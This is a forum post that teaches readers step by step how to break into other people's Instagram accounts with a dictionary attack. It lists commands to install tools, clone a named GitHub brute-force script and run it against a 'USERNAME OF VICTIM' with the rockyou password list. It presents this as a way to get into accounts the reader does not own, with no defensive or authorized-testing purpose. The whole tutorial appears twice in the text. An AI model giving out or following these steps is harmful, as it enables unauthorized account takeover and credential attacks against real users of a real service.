OP 19 June, 2020 - 05:02 PM
Hello guy,s I'm going to teach you how to access instagram accounts
all you need for that is Kali Linux, Parrot Sec OS or another Linux OS.
(You can download Parrot OS from here https://parrotsec.org and Kali Linux from here https://kali.org)
THAT'S IT! LET'S GO!
Alright so for the purpose of this tutorial I am going to use the technique of brute force. Brute force is the technique of trying random passwords against a single user from a pre-defined character set or more specificially we can say I am gonna to talk about a dictionary attack. So a dictionary attack is an attack in which the passwords are saved in a file from where we try these passwords on a single user.
THESE ARE THE STEPS WE WILL TAKE:
1. Open Terminal
2. apt update && apt ugrade -y
3. apt-get install git
{installing git to clone repo}
4. apt-get install python
{installing python }
5. apt-get install python3
{installing python3}
6. cd Desktop
{changing directory to desktop}
7. git clone https://github.com/P...L0G1C/Instagram (https://github.com/Pure-L0G1C/Instagram)
{This command will clone the github repo}
AFTER COMPLETION OF THE 7TH COMMAND WE NEED TO RUN:
8. chmod +x Instagram
AFTER THAT RUN:
9. cd Instagram
{changing directory to Instagram}
10. Now run python instagram.py -h to get the help menu
NOW SIMPLY JUST ENTER THIS COMMAND.
python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file
[Wordlist file comes already by default in Linux or Parrot just extract rockyou in /usr/share/wordlists and replace the path]
If the users password is in rockyou than this is going to work but if not than it's your bad luck but you can try other ways if you want! Stay tuned for more posts!
all you need for that is Kali Linux, Parrot Sec OS or another Linux OS.
(You can download Parrot OS from here https://parrotsec.org and Kali Linux from here https://kali.org)
THAT'S IT! LET'S GO!
Alright so for the purpose of this tutorial I am going to use the technique of brute force. Brute force is the technique of trying random passwords against a single user from a pre-defined character set or more specificially we can say I am gonna to talk about a dictionary attack. So a dictionary attack is an attack in which the passwords are saved in a file from where we try these passwords on a single user.
THESE ARE THE STEPS WE WILL TAKE:
1. Open Terminal
2. apt update && apt ugrade -y
3. apt-get install git
{installing git to clone repo}
4. apt-get install python
{installing python }
5. apt-get install python3
{installing python3}
6. cd Desktop
{changing directory to desktop}
7. git clone https://github.com/P...L0G1C/Instagram (https://github.com/Pure-L0G1C/Instagram)
{This command will clone the github repo}
AFTER COMPLETION OF THE 7TH COMMAND WE NEED TO RUN:
8. chmod +x Instagram
AFTER THAT RUN:
9. cd Instagram
{changing directory to Instagram}
10. Now run python instagram.py -h to get the help menu
NOW SIMPLY JUST ENTER THIS COMMAND.
python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file
[Wordlist file comes already by default in Linux or Parrot just extract rockyou in /usr/share/wordlists and replace the path]
If the users password is in rockyou than this is going to work but if not than it's your bad luck but you can try other ways if you want! Stay tuned for more posts!